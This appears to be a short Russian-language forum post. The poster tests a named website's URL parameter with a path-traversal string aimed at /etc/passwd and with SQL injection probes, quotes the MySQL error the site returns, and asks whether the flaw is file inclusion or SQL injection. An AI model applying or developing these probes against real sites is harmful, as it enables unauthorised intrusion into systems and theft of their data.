Я вижу запрос в адресную строку типа:
http://mihadmin.ru/statpage.php?sid=love
Подставляю вместо нее другой запрос:
http://mihadmin.ru/statpage.php?sid=/.../../../.../etc/passwd
На что система мне выдает:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '../.../.../.../.../.../.../../../.../etc/passwd' at line 1 SELECT `id`, `title` FROM `statpage` WHERE `sid`
http://mihadmin.ru/statpage.php?sid=-1' - реагирует с ошибкой.
Но если пытаюсь работать боле глубже
http://mihadmin.ru/statpage.php?sid=-1'+order+by+1/* - столбцы не выводяться
Вообщем, если ли тут иньекция?
Инклуд или скуль?